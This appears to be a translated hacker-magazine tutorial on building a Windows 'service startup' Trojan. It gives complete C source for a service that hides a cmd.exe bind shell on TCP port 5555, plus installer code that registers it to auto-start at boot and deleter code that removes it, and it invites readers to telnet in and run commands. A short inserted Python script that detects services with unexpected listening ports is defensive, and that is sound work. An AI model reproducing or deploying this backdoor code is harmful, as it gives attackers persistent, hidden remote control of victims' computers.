Trojan programming DIY 8th Service Startup Technology

Source: Internet
Author: User

Text and graphics by Cold Air

Open the server-side generator of almost any Trojan and you will find a startup option called "Service Startup", which shows how popular this technique is. But have you ever written such a program yourself? If you have, pour yourself a cup of tea and take a break; if you are not familiar with it, read on.

Generally, writing a service requires two programs: the service program that does the actual work, and a control program used to install, start, stop and remove it. Note that a service program differs from an ordinary program not only in whether it has a GUI window but also in its structure. We will first write the service program of a shell backdoor.

A service program generally consists of four parts: main(), ServiceMain(), Handler(), and of course the function that does the real work, here called MyWork(). The relationship between them is simple: main() calls ServiceMain(), ServiceMain() registers Handler() and starts MyWork(). With this process in mind, we implement the backdoor program step by step.

1. The program entry: main()

The service program starts from main() like any other program, but its main() is extremely simple, because it is only responsible for building the dispatch table and starting the service control dispatcher. The code is as follows (the includes and forward declarations, which the article omits, are added here so the pieces below compile as one program):

#include <winsock2.h>   // must precede windows.h
#include <windows.h>
#include <stdio.h>

void WINAPI  ServiceMain(DWORD dwArgc, LPTSTR *lpszArgv);
void WINAPI  ServiceHandler(DWORD fdwControl);
DWORD WINAPI MainFun(LPVOID lpParam);
void         EmptyPipe(HANDLE hReadPipe1);

void main()
{
    SERVICE_TABLE_ENTRY ServiceTable[2];
    ServiceTable[0].lpServiceName = "name";                                  // service name
    ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;   // entry point the dispatcher runs on a new thread
    ServiceTable[1].lpServiceName = NULL;
    ServiceTable[1].lpServiceProc = NULL;                                    // the last entry must be NULL
    StartServiceCtrlDispatcher(ServiceTable);                                // hand the process over to the service control dispatcher
}

main() is the main thread of the service program. When the Service Control Manager starts a service process, it waits for the service program to call StartServiceCtrlDispatcher(). When the service is started, the dispatcher calls the ServiceMain function on its own thread. When ServiceMain finishes or an error occurs, StartServiceCtrlDispatcher returns and the main process exits.

2. The real service entry: ServiceMain()

ServiceMain() is the real entry point of the service. It does two things. First, it registers a handler that processes control requests from the control program or the Services control panel, such as start, stop and pause. Second, it starts our own work. The implementation code is as follows:

SERVICE_STATUS        ServiceStatus;  // current state, shared with ServiceHandler()
SERVICE_STATUS_HANDLE hStatus;        // handle returned by RegisterServiceCtrlHandler()

void WINAPI ServiceMain(DWORD dwArgc, LPTSTR *lpszArgv)
{
    DWORD status = 0;
    DWORD specificError = 0xfffffff;
    ServiceStatus.dwServiceType             = SERVICE_WIN32;
    ServiceStatus.dwCurrentState            = SERVICE_START_PENDING;
    ServiceStatus.dwControlsAccepted        = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN | SERVICE_ACCEPT_PAUSE_CONTINUE;
    ServiceStatus.dwWin32ExitCode           = 0;
    ServiceStatus.dwServiceSpecificExitCode = 0;
    ServiceStatus.dwCheckPoint              = 0;
    ServiceStatus.dwWaitHint                = 0;
    // Register ServiceHandler() so the SCM can deliver this service's control requests to it
    hStatus = RegisterServiceCtrlHandler("servicename", (LPHANDLER_FUNCTION)ServiceHandler);
    if (hStatus == 0)
        return;

    // Handle error condition
    status = GetLastError();
    if (status != NO_ERROR)
    {
        ServiceStatus.dwCurrentState            = SERVICE_STOPPED;
        ServiceStatus.dwCheckPoint              = 0;
        ServiceStatus.dwWaitHint                = 0;
        ServiceStatus.dwWin32ExitCode           = status;
        ServiceStatus.dwServiceSpecificExitCode = specificError;
        SetServiceStatus(hStatus, &ServiceStatus);
        return;
    }

    // Initialization complete: report the running state
    ServiceStatus.dwCurrentState = SERVICE_RUNNING;
    ServiceStatus.dwCheckPoint   = 0;
    ServiceStatus.dwWaitHint     = 0;
    SetServiceStatus(hStatus, &ServiceStatus);

    // Start our own working thread
    HANDLE hThread = CreateThread(NULL, 0, MainFun, NULL, 0, NULL);
    if (hThread == NULL)
        return;
}
In ServiceMain, RegisterServiceCtrlHandler registers the ServiceHandler function that processes the service's control requests. That function is the next part.

3. The ServiceHandler() function

When you start or stop the service from the Services manager, ServiceHandler() receives the control code, determines which operation was requested and updates the service status accordingly. Its implementation code is as follows:

void WINAPI ServiceHandler(DWORD fdwControl)
{
    switch (fdwControl)
    {
    case SERVICE_CONTROL_PAUSE:
        ServiceStatus.dwCurrentState = SERVICE_PAUSED;
        break;
    case SERVICE_CONTROL_CONTINUE:
        ServiceStatus.dwCurrentState = SERVICE_RUNNING;
        break;
    case SERVICE_CONTROL_STOP:
    case SERVICE_CONTROL_SHUTDOWN:
        ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
        ServiceStatus.dwWin32ExitCode = 0;
        ServiceStatus.dwCheckPoint    = 0;
        ServiceStatus.dwWaitHint      = 0;
        SetServiceStatus(hStatus, &ServiceStatus);
        return;
    case SERVICE_CONTROL_INTERROGATE:
        break;   // the current status is reported below
    default:
        break;
    }
    SetServiceStatus(hStatus, &ServiceStatus);   // report the (possibly updated) status to the SCM
    return;
}
Up to now, the three major functions of the service are complete. What follows is the code that implements the shell.

4. The function that does the work

This is a simple dual-pipe shell server. After it runs, connect with telnet IP 5555; once the connection succeeds, a shell is spawned. The implementation code is as follows:

void EmptyPipe(HANDLE hReadPipe1);   // defined below

DWORD WINAPI MainFun(LPVOID lpParam)
{
    WSADATA wsaData;
    SOCKET server;
    SOCKET client;
    sockaddr_in serverAddr;
    sockaddr_in clientAddr;
    int port = 5555;
    WORD ver = MAKEWORD(2, 2);                    // requested Winsock version
    WSAStartup(ver, &wsaData);                    // initialise Winsock
    server = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    serverAddr.sin_family = AF_INET;
    serverAddr.sin_port = htons(port);
    serverAddr.sin_addr.S_un.S_addr = htonl(INADDR_ANY);
    bind(server, (sockaddr *)&serverAddr, sizeof(serverAddr));
    listen(server, 5);
    int len = sizeof(clientAddr);
    client = accept(server, (sockaddr *)&clientAddr, &len);
    HANDLE hWritePipe, hReadPipe, hWriteShell, hReadShell;
    SECURITY_ATTRIBUTES saPipe;
    STARTUPINFO lpStartupInfo;
    PROCESS_INFORMATION lpProcessInfo;
    char szBuffer[65535];
    DWORD dwBufferRead;
    int ret;
    saPipe.nLength = sizeof(saPipe);
    saPipe.bInheritHandle = TRUE;                 // the pipe handles must be inheritable by cmd.exe
    saPipe.lpSecurityDescriptor = NULL;
    // Create the read and write pipes: hReadPipe carries the shell's output, hWritePipe feeds its input
    CreatePipe(&hReadPipe, &hReadShell, &saPipe, 0);
    CreatePipe(&hWriteShell, &hWritePipe, &saPipe, 0);
    GetStartupInfo(&lpStartupInfo);
    lpStartupInfo.cb = sizeof(lpStartupInfo);
    lpStartupInfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    lpStartupInfo.hStdInput  = hWriteShell;
    lpStartupInfo.hStdOutput = hReadShell;
    lpStartupInfo.hStdError  = hReadShell;
    lpStartupInfo.wShowWindow = SW_HIDE;
    lpStartupInfo.lpDesktop = "winsta0\\default";
    char cmdline[MAX_PATH];
    GetSystemDirectory(cmdline, MAX_PATH);
    strcat(cmdline, "\\cmd.exe");
    ret = CreateProcess(cmdline, NULL, NULL, NULL, TRUE, 0, NULL, NULL, &lpStartupInfo, &lpProcessInfo);
    while (1)
    {
        ZeroMemory(szBuffer, sizeof(szBuffer));
        PeekNamedPipe(hReadPipe, szBuffer, sizeof(szBuffer), &dwBufferRead, NULL, NULL);
        if (dwBufferRead != 0)
        {
            ret = ReadFile(hReadPipe, szBuffer, sizeof(szBuffer), &dwBufferRead, NULL);
            if (ret)
            {
                // Note: as written here, the shell's output is only printed to the service's own
                // hidden console and then discarded; nothing is sent back over the socket.
                printf("The ReadFile buffer is %s:\n", szBuffer);
                EmptyPipe(hReadPipe);
            }
        }
        else
        {
            ZeroMemory(szBuffer, sizeof(szBuffer));
            ret = recv(client, szBuffer, sizeof(szBuffer), 0);

            if (ret == SOCKET_ERROR)
            {
                printf("SOCKET_ERROR\n");
                break;
            }
            if (ret > 0)
            {
                WriteFile(hWritePipe, szBuffer, ret, &dwBufferRead, NULL);
            }
        }
        Sleep(100);
    }
    WriteFile(hWritePipe, "exit\r\n", (DWORD)strlen("exit\r\n"), &dwBufferRead, NULL);
    return 0;
}

// Drain whatever is left in the pipe so stale output does not pile up
void EmptyPipe(HANDLE hReadPipe1)
{
    BOOL ret;
    DWORD bytesRead;
    char *buffer = new char[1024];
    while (TRUE)
    {
        memset(buffer, 0, 1024);
        ret = PeekNamedPipe(hReadPipe1, buffer, 1024, &bytesRead, NULL, NULL);
        if (bytesRead == 0 || !ret)
        {
            delete[] buffer;
            return;
        }
        ReadFile(hReadPipe1, buffer, bytesRead, &bytesRead, NULL);
    }
}
So far, the service program is complete. The following two small programs install and delete the service respectively.

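From the defender's side, the service above has a simple external signature: a process that hosts a service and also owns a listening TCP socket. The following Python script, an added example that is not part of the original article, correlates the output of `netstat -ano` with `tasklist /svc` to find exactly such processes. The two captures, the image names and PIDs, and the allow-list of expected service ports are all constructed for this example; on a real host they would come from running those two commands.

```python
import re

# Constructed `netstat -ano` capture (not from a real host).
NETSTAT_SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5555           0.0.0.0:0              LISTENING       2840
  TCP    10.0.0.5:49710         10.0.0.9:443           ESTABLISHED     3120
  UDP    0.0.0.0:5353           *:*                                    1488
"""

# Constructed `tasklist /svc` capture; "updater.exe" hosting the service "name"
# is a hypothetical stand-in for the dual-pipe shell service.
TASKLIST_SAMPLE = """
Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
services.exe                   688 N/A
svchost.exe                    912 RpcEptMapper, RpcSs
svchost.exe                   1488 Dnscache
updater.exe                   2840 name
chrome.exe                    3120 N/A
"""

# Ports that services on this host are expected to listen on (constructed
# baseline; replace it with the real baseline of the host being examined).
EXPECTED_SERVICE_PORTS = {135, 445}

# One tasklist row: image name, PID, then the comma-separated service list (or N/A).
TASKLIST_RE = re.compile(r"^(?P<image>.+?)\s+(?P<pid>\d+)\s+(?P<services>\S.*)$")


def parse_netstat(text):
    """Return a list of (port, pid) for every TCP socket in LISTENING state."""
    listening = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) == 5 and fields[0] == "TCP" and fields[3] == "LISTENING":
            port = int(fields[1].rsplit(":", 1)[1])   # works for IPv4 and [::]:port
            listening.append((port, int(fields[4])))
    return listening


def parse_tasklist(text):
    """Return {pid: (image, [service names])}, skipping processes that host no service."""
    procs = {}
    for line in text.splitlines():
        m = TASKLIST_RE.match(line.rstrip())
        if not m or m.group("services") == "N/A":
            continue
        names = [s.strip() for s in m.group("services").split(",")]
        procs[int(m.group("pid"))] = (m.group("image").strip(), names)
    return procs


def find_listening_services(netstat_text, tasklist_text, expected_ports=EXPECTED_SERVICE_PORTS):
    """Return one finding per service-hosting PID that listens on a port outside the baseline."""
    service_procs = parse_tasklist(tasklist_text)
    findings = []
    for port, pid in parse_netstat(netstat_text):
        if pid in service_procs and port not in expected_ports:
            image, names = service_procs[pid]
            findings.append({"port": port, "pid": pid, "image": image, "services": names})
    return findings


if __name__ == "__main__":
    for f in find_listening_services(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print(f"service(s) {', '.join(f['services'])} in {f['image']} (PID {f['pid']}) "
              f"listen on TCP {f['port']}")
```

The join on PID is the whole point: a listening port by itself is normal, and a service by itself is normal, but a service binary that is not part of the host's baseline and opens its own listener is what the program in section 4 looks like at runtime. Listeners owned by PID 4 (the System process) are skipped here because `tasklist /svc` reports no service for it.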
5. Installing the service program

#include <windows.h>
#include <winsvc.h>
#include <stdio.h>

void main()
{
    char name[100];
    char info[200];
    char path[300];
    printf("Enter the service name\n");
    scanf("%99s", name);
    printf("Enter the service display name\n");
    scanf("%199s", info);
    printf("Enter the program path\n");
    scanf("%299s", path);
    SC_HANDLE manager = NULL;
    SC_HANDLE service = NULL;
    if ((manager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE)) == NULL)
    {
        printf("OpenSCManager error\n");
        return;
    }
    service = CreateService(
        manager, name, info,                          // service name and display name
        SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,
        SERVICE_AUTO_START, SERVICE_ERROR_NORMAL,     // started automatically at boot
        path, 0, 0, 0, 0, 0);                         // binary path; no group, tag, dependencies or account
    if (service)
        printf("Service created successfully\n");
    else
        printf("Service creation failed\n");
    CloseServiceHandle(service);
    CloseServiceHandle(manager);
}

6. Deleting the service program

#include <windows.h>
#include <winsvc.h>
#include <stdio.h>

void main()
{
    char name[100];
    SC_HANDLE scm;
    SC_HANDLE service;
    SERVICE_STATUS status;
    printf("Enter the name of the service to be deleted\n");
    scanf("%99s", name);

    if ((scm = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE)) == NULL)
    {
        printf("OpenSCManager error\n");
        return;
    }
    service = OpenService(scm, name, SERVICE_ALL_ACCESS | DELETE);
    if (!service)
    {
        printf("OpenService error!\n");
        return;
    }
    BOOL isSuccess = QueryServiceStatus(service, &status);
    if (!isSuccess)
    {
        printf("QueryServiceStatus error!\n");
        return;
    }
    if (status.dwCurrentState != SERVICE_STOPPED)
    {
        // A running service must be stopped before it can be deleted
        isSuccess = ControlService(service, SERVICE_CONTROL_STOP, &status);
        if (!isSuccess)
            printf("Stop service error!\n");
        Sleep(500);
    }
    isSuccess = DeleteService(service);
    if (!isSuccess)
        printf("Failed to delete service!\n");
    else
        printf("Service deleted!\n");
    CloseServiceHandle(service);
    CloseServiceHandle(scm);
}

Service creation and deletion are not described in detail here; if you need them, refer to the March issue's programming topic "DIY Trojan programming: system services". After running the installer and restarting the computer, you can use telnet 127.0.0.1 5555 to execute commands. If you want to write a service program of your own, you can simply replace the working thread in this source code, which I believe will save you a lot of work.
